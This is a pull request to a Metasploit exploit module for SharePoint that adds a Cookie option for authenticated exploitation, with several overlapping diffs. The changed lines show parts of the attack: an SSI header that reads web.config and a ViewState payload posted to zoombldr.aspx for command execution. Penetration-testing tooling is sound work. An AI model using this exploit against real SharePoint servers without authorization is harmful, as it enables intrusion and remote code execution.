### PR TITLE
Update sharepoint_ssi_viewstate

### DIFF
--- a/modules/exploits/windows/http/sharepoint_ssi_viewstate.rb
+++ b/modules/exploits/windows/http/sharepoint_ssi_viewstate.rb
@@ -90,10 +90,10 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options([
       OptString.new('TARGETURI', [true, 'Base path', '/']),
       OptString.new('VALIDATION_KEY', [false, 'ViewState validation key']),
+      OptString.new('Cookie', [false, 'SharePoint cookie if you have one']),
       # "Promote" these advanced options so we don't have to pass around our own
       OptString.new('HttpUsername', [false, 'SharePoint username']),
-      OptString.new('HttpPassword', [false, 'SharePoint password']),
-      OptString.new('Cookie', [false, 'SharePoint cookie if you have one'])
+      OptString.new('HttpPassword', [false, 'SharePoint password'])
     ])
   end
 

--- a/modules/exploits/windows/http/sharepoint_ssi_viewstate.rb
+++ b/modules/exploits/windows/http/sharepoint_ssi_viewstate.rb
@@ -208,8 +208,8 @@ class MetasploitModule < Msf::Exploit::Remote
     res = send_request_cgi(
       'method' => 'GET',
       'uri' => ssi_path,
+      'cookie' => cookie,
       'headers' => {
-        'Cookie' => cookie,
         ssi_header => '<form runat="server" /><!--#include virtual="/web.config"-->'
       }
     )

--- a/modules/exploits/windows/http/sharepoint_ssi_viewstate.rb
+++ b/modules/exploits/windows/http/sharepoint_ssi_viewstate.rb
@@ -265,9 +265,7 @@ class MetasploitModule < Msf::Exploit::Remote
     res = send_request_cgi(
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, '/_layouts/15/zoombldr.aspx'),
-      'headers' => {
-        'Cookie' => cookie
-      },
+      'cookie' => cookie,
       'vars_post' => {
         '__VIEWSTATE' => generate_viewstate_payload(
           cmd,

--- a/modules/exploits/windows/http/sharepoint_ssi_viewstate.rb
+++ b/modules/exploits/windows/http/sharepoint_ssi_viewstate.rb
@@ -93,7 +93,7 @@ class MetasploitModule < Msf::Exploit::Remote
       # "Promote" these advanced options so we don't have to pass around our own
       OptString.new('HttpUsername', [false, 'SharePoint username']),
       OptString.new('HttpPassword', [false, 'SharePoint password']),
-      OptString.new('Cookie', [false, 'Cookie'])
+      OptString.new('Cookie', [false, 'SharePoint cookie if you have one'])
     ])
   end
 

--- a/modules/exploits/windows/http/sharepoint_ssi_viewstate.rb
+++ b/modules/exploits/windows/http/sharepoint_ssi_viewstate.rb
@@ -127,9 +127,7 @@ class MetasploitModule < Msf::Exploit::Remote
     res = send_request_cgi(
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path),
-      'headers' => {
-        'Cookie' => cookie
-      },
+      'cookie' => cookie
     )
 
     unless res

--- a/modules/exploits/windows/http/sharepoint_ssi_viewstate.rb
+++ b/modules/exploits/windows/http/sharepoint_ssi_viewstate.rb
@@ -181,10 +181,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
     res = send_request_cgi(
       'method' => 'PUT',
-      'headers' => {
-        'Cookie' => cookie
-      },
       'uri' => ssi_path,
+      'cookie' => cookie,
       'data' => ssi_page
     )
 

--- a/modules/exploits/windows/http/sharepoint_ssi_viewstate.rb
+++ b/modules/exploits/windows/http/sharepoint_ssi_viewstate.rb
@@ -243,9 +243,7 @@ class MetasploitModule < Msf::Exploit::Remote
     res = send_request_cgi(
       'method' => 'DELETE',
       'uri' => ssi_path,
-      'headers' => {
-        'Cookie' => cookie
-      },
+      'cookie' => cookie,
       'partial' => true
     )
 

--- a/modules/exploits/windows/http/sharepoint_ssi_viewstate.rb
+++ b/modules/exploits/windows/http/sharepoint_ssi_viewstate.rb
@@ -92,7 +92,9 @@ class MetasploitModule < Msf::Exploit::Remote
       OptString.new('VALIDATION_KEY', [false, 'ViewState validation key']),
       # "Promote" these advanced options so we don't have to pass around our own
       OptString.new('HttpUsername', [false, 'SharePoint username']),
-      OptString.new('HttpPassword', [false, 'SharePoint password'])
+      OptString.new('HttpPassword', [false, 'SharePoint password']),
+      OptString.new('Cookie', [false, 'Cookie']),
+      OptString.new('User-Agent', [false, 'User-Agent'])
     ])
   end
 
@@ -108,6 +110,14 @@ class MetasploitModule < Msf::Exploit::Remote
     datastore['HttpPassword']
   end
 
+  def cookie
+    datastore['Cookie']
+  end
+
+  def user_agent
+    datastore['User-Agent']
+  end
+
   def vuln_builds
     # https://docs.microsoft.com/en-us/officeupdates/sharepoint-updates
     # https://buildnumbers.wordpress.com/sharepoint/
@@ -121,7 +131,11 @@ class MetasploitModule < Msf::Exploit::Remote
   def check
     res = send_request_cgi(
       'method' => 'GET',
-      'uri' => normalize_uri(target_uri.path)
+      'uri' => normalize_uri(target_uri.path),
+      'headers' => {
+        'Cookie' => cookie,
+        'User-Agent' => user_agent
+      },
     )
 
     unless res
@@ -175,6 +189,10 @@ class MetasploitModule < Msf::Exploit::Remote
 
     res = send_request_cgi(
       'method' => 'PUT',
+      'headers' => {
+        'Cookie' => cookie,
+        'User-Agent' => user_agent
+      },
       'uri' => ssi_path,
       'data' => ssi_page
     )
@@ -202,6 +220,8 @@ class MetasploitModule < Msf::Exploit::Remote
       'method' => 'GET',
       'uri' => ssi_path,
       'headers' => {
+        'Cookie' => cookie,
+        'User-Agent' => user_agent,
         ssi_header => '<form runat="server" /><!--#include virtual="/web.config"-->'
       }
     )
@@ -235,6 +255,10 @@ class MetasploitModule < Msf::Exploit::Remote
     res = send_request_cgi(
       'method' => 'DELETE',
       'uri' => ssi_path,
+      'headers' => {
+        'Cookie' => cookie,
+        'User-Agent' => user_agent
+      },
       'partial' => true
     )
 
@@ -256,6 +280,10 @@ class MetasploitModule < Msf::Exploit::Remote
     res = send_request_cgi(
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, '/_layouts/15/zoombldr.aspx'),
+      'headers' => {
+        'Cookie' => cookie,
+        'User-Agent' => user_agent
+      },
       'vars_post' => {
         '__VIEWSTATE' => generate_viewstate_payload(
           cmd,

--- a/modules/exploits/windows/http/sharepoint_ssi_viewstate.rb
+++ b/modules/exploits/windows/http/sharepoint_ssi_viewstate.rb
@@ -93,8 +93,7 @@ class MetasploitModule < Msf::Exploit::Remote
       # "Promote" these advanced options so we don't have to pass around our own
       OptString.new('HttpUsername', [false, 'SharePoint username']),
       OptString.new('HttpPassword', [false, 'SharePoint password']),
-      OptString.new('Cookie', [false, 'Cookie']),
-      OptString.new('User-Agent', [false, 'User-Agent'])
+      OptString.new('Cookie', [false, 'Cookie'])
     ])
   end
 
@@ -114,10 +113,6 @@ class MetasploitModule < Msf::Exploit::Remote
     datastore['Cookie']
   end
 
-  def user_agent
-    datastore['User-Agent']
-  end
-
   def vuln_builds
     # https://docs.microsoft.com/en-us/officeupdates/sharepoint-updates
     # https://buildnumbers.wordpress.com/sharepoint/
@@ -133,8 +128,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path),
       'headers' => {
-        'Cookie' => cookie,
-        'User-Agent' => user_agent
+        'Cookie' => cookie
       },
     )
 
@@ -190,8 +184,7 @@ class MetasploitModule < Msf::Exploit::Remote
     res = send_request_cgi(
       'method' => 'PUT',
       'headers' => {
-        'Cookie' => cookie,
-        'User-Agent' => user_agent
+        'Cookie' => cookie
       },
       'uri' => ssi_path,
       'data' => ssi_page
@@ -221,7 +214,6 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => ssi_path,
       'headers' => {
         'Cookie' => cookie,
-        'User-Agent' => user_agent,
         ssi_header => '<form runat="server" /><!--#include virtual="/web.config"-->'
       }
     )
@@ -256,8 +248,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'method' => 'DELETE',
       'uri' => ssi_path,
       'headers' => {
-        'Cookie' => cookie,
-        'User-Agent' => user_agent
+        'Cookie' => cookie
       },
       'partial' => true
     )
@@ -281,8 +272,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, '/_layouts/15/zoombldr.aspx'),
       'headers' => {
-        'Cookie' => cookie,
-        'User-Agent' => user_agent
+        'Cookie' => cookie
       },
       'vars_post' => {
         '__VIEWSTATE' => generate_viewstate_payload(


### PR DESCRIPTION
Add Cookie header as exploit input.
This can be used when authentication is performed trough an HTTP form for example.

Verification
List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use exploit/windows/http/sharepoint_ssi_viewstate`
- [ ] `set Cookie ''`
- [ ] **Verify** Configure other inputs function of the target and run the exploit. The exploit shall work properly using added inputs.

This has been successfully tested during an audit.
